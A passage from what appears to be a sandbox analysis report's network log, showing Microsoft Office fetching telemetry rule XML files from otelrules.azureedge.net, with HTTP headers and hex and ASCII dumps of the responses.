                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            114192.168.2.44994513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:41 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                            x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032742Z-178bfbc474bvjk8shC1NYC83ns000000024000000000s6nw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            115192.168.2.44994613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:41 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                            x-ms-request-id: 40694bf4-501e-008c-7530-3ccd39000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032742Z-178bfbc474bv7whqhC1NYC1fg400000002b000000000gymk
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            116192.168.2.44994713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:42 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                            x-ms-request-id: 4b825c62-901e-008f-3f5c-3b67a6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032742Z-178bfbc474btvfdfhC1NYCa2en00000002g0000000008c55
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:42 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            117192.168.2.44994813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:43 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                            x-ms-request-id: 2620e4ad-c01e-008d-6675-3b2eec000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032744Z-178bfbc474bxkclvhC1NYC69g4000000028000000000m7xn
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            118192.168.2.44994913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:43 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                            x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032744Z-178bfbc474bgvl54hC1NYCsfuw00000002ag00000000hb72
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            119192.168.2.44995013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                            x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032744Z-178bfbc474bp8mkvhC1NYCzqnn00000002b0000000000u2n
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            120192.168.2.44995113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                            x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032744Z-174c587ffdfmrvb9hC1TEBtn3800000000x00000000074d0
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            121192.168.2.44995213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:44 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                            x-ms-request-id: 6a566218-301e-0099-5f54-3c6683000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032744Z-178bfbc474bwlrhlhC1NYCy3kg00000002dg000000008s10
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:45 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            122192.168.2.44995413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                            x-ms-request-id: 119e228c-001e-0046-1663-3bda4b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032746Z-178bfbc474btrnf9hC1NYCb80g00000002eg00000000pbpt
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            123192.168.2.44995313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
